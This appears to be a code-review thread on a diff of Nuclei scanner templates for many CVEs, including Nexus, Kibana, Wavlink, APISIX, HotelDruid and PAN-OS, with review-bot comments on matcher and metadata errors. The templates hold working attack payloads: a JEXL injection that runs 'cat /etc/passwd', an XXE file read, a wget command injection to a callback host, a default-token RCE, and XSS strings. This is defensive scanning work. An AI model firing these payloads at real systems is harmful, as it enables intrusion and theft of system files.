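Review bot: The added `remediation` says to upgrade "to a version higher than 3.15.0", which disagrees with the new `name` (`<3.15.0`) and `description` ("before 3.15.0"), both of which treat 3.15.0 itself as fixed. I would word it as `Upgrade Sonatype Nexus Repository Manager to version 3.15.0 or later.` so that an operator already on 3.15.0 is not told to upgrade again. The raw request continues in the next hunk.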
@@ -24,14 +34,14 @@ requests: {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='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'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} - matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 +# digest: 490a0046304402200c1b5dd410d203ff883f0a3d3fb1a599927754d015739c8040a91108820696db02203d95ded379f7102523203db7a93cad306563b9f707bca8525d3565636cd1d1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-7609.yaml b/poc/cve/CVE-2019-7609.yaml index dc14d4219e..b3985eb7e2 100644 --- a/poc/cve/CVE-2019-7609.yaml +++ b/poc/cve/CVE-2019-7609.yaml 
@@ -1,35 +1,56 @@ id: CVE-2019-7609 + info: - name: Kibana Timelion Arbitrary Code Execution + name: Kibana Timelion - Arbitrary Code Execution author: dwisiswant0 severity: critical description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + remediation: | + Apply the latest security patches or upgrade to a patched version of Kibana to mitigate the vulnerability. reference: - https://github.com/mpgn/CVE-2019-7609 - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 - tags: cve,cve2019,kibana,rce + - https://nvd.nist.gov/vuln/detail/CVE-2019-7609 + - https://www.elastic.co/community/security + - https://access.redhat.com/errata/RHBA-2019:2824 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.00 + cvss-score: 10 cve-id: CVE-2019-7609 cwe-id: CWE-94 -requests: + epss-score: 0.96365 + epss-percentile: 0.99425 + cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: elastic + product: kibana + tags: cve,cve2019,kibana,rce,kev + +http: - method: POST path: - "{{BaseURL}}/api/timelion/run" + + body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' + headers: Content-Type: "application/json; charset=utf-8" - body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' + matchers-condition: and matchers: - type: word + part: body words: - "seriesList" - part: body + - type: word + part: header words: - "application/json" - part: header + - type: status status: - 200 + +# digest: 
4a0a004730450221008b1f553204c6827d61235a510f63ee04de3339b1c37fc2ce692c3040bbd3c74d02201f382a69ae911a521674bc680cbaa2122361ffd958e7322ec3bde38075b347ee:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-8446.yaml b/poc/cve/CVE-2019-8446.yaml index a9ac2017f2..99959daaf4 100644 --- a/poc/cve/CVE-2019-8446.yaml +++ b/poc/cve/CVE-2019-8446.yaml @@ -2,30 +2,20 @@ id: CVE-2019-8446 info: name: Jira Improper Authorization + description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. author: dhiyaneshDk severity: medium - description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check. - remediation: | - Apply the latest security patches and updates provided by Atlassian to fix the vulnerability. - reference: - - https://jira.atlassian.com/browse/JRASERVER-69777 - - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839 + tags: cve,cve2019,jira classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2019-8446 cwe-id: CWE-863 - epss-score: 0.15691 - epss-percentile: 0.95377 - cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: atlassian - product: jira_server - shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2019,jira + reference: + - https://jira.atlassian.com/browse/JRASERVER-69777 + - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839 -http: +requests: - raw: - | POST /rest/issueNav/1/issueTable HTTP/1.1 
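Review bot: The three matchers (`seriesList` in the body, `application/json` in the header, status 200) only establish that `/api/timelion/run` answered a benign `.es(*)` query, so a patched Kibana with Timelion reachable would presumably match as well. The template nevertheless reports the hit at `severity: critical`, and this change adds the `kev` tag, which will raise the priority of any false positive. Nothing in the visible request or matchers checks the version. I would add a comment above `matchers-condition`, for example `# Matches any reachable Timelion endpoint; confirm the Kibana version (before 5.6.15 / 6.6.1) before reporting.`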
@@ -41,11 +31,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "the user does not exist" - + part: body - type: status status: - 200 -# digest: 4b0a00483046022100b7b546af885a03b0df7684b09ff17e18c6148be5124b25120dbef355415ef24b022100871c06bac93132911abbdf5d5ca5f5bfda0631167b8af35d7973aa8fab44435f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-8937.yaml b/poc/cve/CVE-2019-8937.yaml index fc33321181..21ea7f64cc 100644 --- a/poc/cve/CVE-2019-8937.yaml +++ b/poc/cve/CVE-2019-8937.yaml 
@@ -1,36 +1,55 @@ id: CVE-2019-8937 + info: - name: HotelDruid 2.3.0 - XSS + name: HotelDruid 2.3.0 - Cross-Site Scripting author: LogicalHunter severity: medium - reference: https://www.exploit-db.com/exploits/46429 - tags: cve,cve2019,xss,hoteldruid + description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php. + remediation: | + Upgrade to a patched version of HotelDruid or apply appropriate input sanitization to prevent XSS attacks. + reference: + - https://www.exploit-db.com/exploits/46429 + - https://sourceforge.net/projects/hoteldruid/ + - http://packetstormsecurity.com/files/151779/HotelDruid-2.3-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-8937 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2019-8937 cwe-id: CWE-79 - description: "HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php." 
-requests: + epss-score: 0.00921 + epss-percentile: 0.81114 + cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: digitaldruid + product: hoteldruid + tags: packetstorm,cve,cve2019,xss,hoteldruid,edb + +http: - method: GET path: - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' - - # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' + # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' + # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' + # - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' + # - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' + # - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' - # - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' - - # - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' - - # - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' matchers-condition: and matchers: - type: word - words: - - '"' part: body + words: + - '""> - ]> - - John - &ent; - - - headers: - Content-Type: "text/xml" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 -# digest: 
4b0a00483046022100a1f3d8973a3f6a7ac32f58cb5e53efee2c4fa5399249b0178d34336abc912f630221009be727a15ddbd912afed15bf1edec6cc67fcd494709882c5bbc2460e45e1e32f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +id: CVE-2020-11991 + +info: + name: Apache Cocoon 2.1.12 XML Injection + author: pikpikcu + severity: high + tags: cve,cve2020,apache,xml,cocoon + description: | + When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. + reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-11991 + cwe-id: CWE-611 + +requests: + - method: POST + path: + - "{{BaseURL}}/v2/api/product/manger/getInfo" + headers: + Content-Type: "text/xml" + body: | + + ]> + + John + &ent; + + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2020-13117.yaml b/poc/cve/CVE-2020-13117.yaml index bfc0ff9a86..7f7efe6b19 100644 --- a/poc/cve/CVE-2020-13117.yaml +++ b/poc/cve/CVE-2020-13117.yaml 
@@ -1,18 +1,32 @@ id: CVE-2020-13117 + info: - name: Wavlink Multiple AP - Unauthenticated RCE + name: Wavlink Multiple AP - Remote Command Injection author: gy741 severity: critical - description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected. + description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html - tags: cve,cve2020,wavlink,rce,oast + - https://nvd.nist.gov/vuln/detail/CVE-2020-13117 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 -requests: + epss-score: 0.05816 + epss-percentile: 0.92581 + cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn575a4_firmware + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2020,wavlink,rce,oast,router + +http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 
@@ -22,8 +36,20 @@ requests: Accept-Encoding: gzip, deflate newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en + + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + + - type: word + part: body + words: + - "parent.location.replace" + + - type: status + status: + - 200 +# digest: 4a0a0047304502206b6c68366258ff0f9f19d5481e672ca251188b4aac0272b44aa4165559059429022100eafb7ed5fa6940c5012044041ffa0434bba7f1bda16a36c847d4af1f493a62b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-13121.yaml b/poc/cve/CVE-2020-13121.yaml index 38db107834..18c5bd1dd6 100644 --- a/poc/cve/CVE-2020-13121.yaml +++ b/poc/cve/CVE-2020-13121.yaml 
@@ -1,24 +1,43 @@ id: CVE-2020-13121 + info: - name: Submitty 20.04.01 - Open redirect + name: Submitty <= 20.04.01 - Open Redirect author: 0x_Akoko severity: medium - description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. + description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability. reference: - https://github.com/Submitty/Submitty/issues/5265 - - https://www.cvedetails.com/cve/CVE-2020-13121 - tags: cve,cve2020,redirect,submitty + - https://nvd.nist.gov/vuln/detail/CVE-2020-13121 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2020-13121 cwe-id: CWE-601 -requests: - - method: GET - path: - - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' + epss-score: 0.00235 + epss-percentile: 0.61542 + cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: rcos + product: submitty + tags: cve,cve2020,redirect,submitty,oos + +http: + - raw: + - | + POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/authentication/login + + user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 
4a0a00473045022035d2421a9ebcfc9da5f2ce7c4f77266308734b45f7b8a598b52e17083179e1eb022100f6795778a9d9d900599a036ee40766d6e8866cf5232da80aebed6772e6553629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-13945.yaml b/poc/cve/CVE-2020-13945.yaml index 6c740884d6..dc1f2480b4 100644 --- a/poc/cve/CVE-2020-13945.yaml +++ b/poc/cve/CVE-2020-13945.yaml 
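Review bot: The new request sends `old=http%253A%252F%252Fexample.com%252Fhome`, but the new `Location` regex only accepts a host ending in `interact\.sh`, so as written the matcher cannot fire on the redirect this request asks for. The two need to name the same host, for example by ending the host part of the regex with `example\.com\/?(\/|[^.].*)?$`. The added `remediation` also tells users to upgrade to "20.04.01 or later" although the name and description state that 20.04.01 is affected; it should point to a release after 20.04.01. `{{username}}` and `{{password}}` are used in the form body but are not defined in the visible lines, so a comment saying they must be supplied at run time would help.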
@@ -1,22 +1,32 @@ id: CVE-2020-13945 info: - name: Apache APISIX's Admin API Default Access Token (RCE) + name: Apache APISIX - Insufficiently Protected Credentials author: pdteam severity: medium - description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5. + description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. + remediation: | + Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-13945 - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-13945 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-13945 - tags: cve,cve2020,apache,apisix,rce,intrusive + cwe-id: CWE-522 + epss-score: 0.00558 + epss-percentile: 0.75057 + cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: apisix + tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix -requests: +http: - raw: - | POST /apisix/admin/routes HTTP/1.1 @@ -34,7 +44,6 @@ requests: } } } - - | GET /{{randstr}}?cmd=id HTTP/1.1 Host: {{Hostname}} 
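Review bot: The rewritten `description` says "An attacker can enable the Admin API and delete the Admin API access IP restriction rules", which reverses the precondition given in the removed text, where the operator had enabled the Admin API and removed the IP restrictions. As worded it misleads defenders about what to check, because the exposure depends on their own configuration and not on an attacker action. I would phrase it as `description: Apache APISIX 1.2 through 1.5 accepts the default Admin API token when the operator has enabled the Admin API and removed its IP restriction rules, exposing APISIX management data.` The `remediation` could then name the concrete steps: change the default token and restore the IP allow-list.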
@@ -56,3 +65,4 @@ requests: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" +# digest: 490a00463044022059948a8dfd44a57bc20ceb27424c8b6a9f92b0f5cf9c192aec6022a38870ad0802205e7e7adccf142d1423b78d8783395994e7e97b1269caee8f2f0f4c3807e5dfc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-14408.yaml b/poc/cve/CVE-2020-14408.yaml index da2c7cee43..36f102aa68 100644 --- a/poc/cve/CVE-2020-14408.yaml +++ b/poc/cve/CVE-2020-14408.yaml 
@@ -1,48 +1,35 @@ id: CVE-2020-14408 - info: - name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting + name: Agentejo Cockpit 0.10.2 - Reflected XSS author: edoardottt severity: medium - description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. - remediation: | - Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability. - reference: - - https://github.com/agentejo/cockpit/issues/1310 - - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-14408 cwe-id: CWE-79 - epss-score: 0.00113 - epss-percentile: 0.44654 - cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* + reference: + - https://github.com/agentejo/cockpit/issues/1310 + - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408 metadata: verified: true - max-request: 1 - vendor: agentejo - product: cockpit - tags: cve,cve2020,cockpit,agentejo,xss,oss - -http: + tags: cve,cve2022,cockpit,agentejo,xss,oss +requests: - method: GET path: - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" - matchers-condition: and matchers: - type: word part: body words: - "redirectTo = '/92874';alert(document.domain)//280';" - - type: word part: header words: - "text/html" - - type: status status: - 200 -# digest: 
4a0a00473045022100f046742ca6baf1a25c400a234749a56c4b5bb79ff750292c6687d79b1a29787a02206d3d31b553ad045dcae9e83c625840603dad0e8035388a0eb679d1f336962797:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-19282.yaml b/poc/cve/CVE-2020-19282.yaml index a0c9ce9a20..b89e24088b 100644 --- a/poc/cve/CVE-2020-19282.yaml +++ b/poc/cve/CVE-2020-19282.yaml 
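Review bot: The new `tags` line reads `cve,cve2022,cockpit,agentejo,xss,oss`, but the template id and `cve-id` are both CVE-2020-14408, so the year tag is wrong. Tag-based selection for 2020 CVEs would skip this template, and a 2022 run would pick it up unexpectedly. It should be `tags: cve,cve2020,cockpit,agentejo,xss,oss`, as on the removed side.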
@@ -1,48 +1,33 @@ id: CVE-2020-19282 - info: - name: Jeesns 1.4.2 - Cross-Site Scripting + name: Jeesns 1.4.2 XSS author: pikpikcu severity: medium - description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. - remediation: | - Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability. + description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. reference: - https://github.com/zchuanzhao/jeesns/issues/11 - - https://www.seebug.org/vuldb/ssvid-97940 - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 + - https://www.seebug.org/vuldb/ssvid-97940 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-19282 cwe-id: CWE-79 - epss-score: 0.00135 - epss-percentile: 0.48553 - cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: jeesns - product: jeesns tags: cve,cve2020,jeesns,xss - -http: +requests: - method: GET path: - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - '' - + part: body + - type: status + status: + - 200 - type: word part: header words: - text/html - - - type: status - status: - - 200 -# digest: 4b0a00483046022100c1617122a3deecf5f59e58103bdb8cdae738169ce090ad2a393518924d6f6657022100e4b1858fa082f420c428304fb5048eb8a637944c11f5aaaf0cdbe24595be5f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-19360.yaml b/poc/cve/CVE-2020-19360.yaml index 260f3ae9f8..b9660cb345 100644 --- a/poc/cve/CVE-2020-19360.yaml +++ b/poc/cve/CVE-2020-19360.yaml 
@@ -1,30 +1,43 @@ id: CVE-2020-19360 + info: name: FHEM 6.0 - Local File Inclusion author: 0x_Akoko severity: high description: FHEM version 6.0 suffers from a local file inclusion vulnerability. + remediation: | + Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md - - https://www.cvedetails.com/cve/CVE-2020-19360/ - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability - https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png + - https://nvd.nist.gov/vuln/detail/CVE-2020-19360 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-19360 + cwe-id: CWE-22 + epss-score: 0.0545 + epss-percentile: 0.92359 + cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: fhem + product: fhem tags: fhem,lfi,cve,cve2020 -requests: + +http: - method: GET path: - "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/05/04 +# digest: 4b0a004830460221009447a4515b18dedbac516662c7eede6b882e0fe6b6b4a65d90fc04b816af52af0221009b625f9cd0b3451bbb28e290000b1dc79572d03bbba44ddc1291e41581777092:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-2036.yaml b/poc/cve/CVE-2020-2036.yaml index b2e2d88fd6..fc2519a3aa 100644 --- a/poc/cve/CVE-2020-2036.yaml +++ b/poc/cve/CVE-2020-2036.yaml 
@@ -1,53 +1,34 @@ id: CVE-2020-2036 - info: - name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting - author: madrobot,j4vaovo + name: Palo Alto Networks Reflected XSS + author: madrobot severity: high - description: | - PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. - remediation: | - Apply the latest security patches or updates provided by Palo Alto Networks to mitigate this vulnerability. - reference: - - https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ - - https://security.paloaltonetworks.com/CVE-2020-2036 - - https://nvd.nist.gov/vuln/detail/CVE-2020-2036 + description: > + A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. 
+ + reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ + tags: cve,cve2020,vpn,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2020-2036 cwe-id: CWE-79 - epss-score: 0.01161 - epss-percentile: 0.83286 - cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* - metadata: - max-request: 3 - vendor: paloaltonetworks - product: pan-os - tags: cve,cve2020,vpn,xss - -http: - - raw: - - | - GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - - | - GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - - | - GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - +requests: + - method: GET + path: + - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" + - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" + stop-at-first-match: true matchers-condition: and matchers: - - type: dsl - dsl: - - "!contains(tolower(body_1), '')" - condition: and - - - type: dsl - dsl: - - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')" - - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')" - condition: or -# digest: 4b0a00483046022100a1a6f4b784950a7a2db652c1d0511299ebbbf1b786913e5bc5f57cb55dad99fd022100b49385d913c913fe66bf667e95238f9fa294081837ce4d2890f7aa692f5d1414:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: status + status: + - 200 + - type: word + words: + - "" + part: body + - type: word + words: + - "text/html" + part: header diff --git a/poc/cve/CVE-2020-20982.yaml b/poc/cve/CVE-2020-20982.yaml index 1a87704c1e..28b76133cf 100644 --- a/poc/cve/CVE-2020-20982.yaml +++ b/poc/cve/CVE-2020-20982.yaml 
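Review bot: The new side drops the control request to `/_404_/...` and the `!contains(tolower(body_1), ...)` matcher that went with it, leaving only a word match on the reflected string plus `text/html` and status 200. Without that baseline, any front end that echoes the request path into an HTML page would presumably be reported as a `severity: high` PAN-OS finding. I would keep the removed three-request DSL form. If the simpler form has to stay, add a comment above `matchers` such as `# No negative control: confirm the host is a PAN-OS management interface before reporting.`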
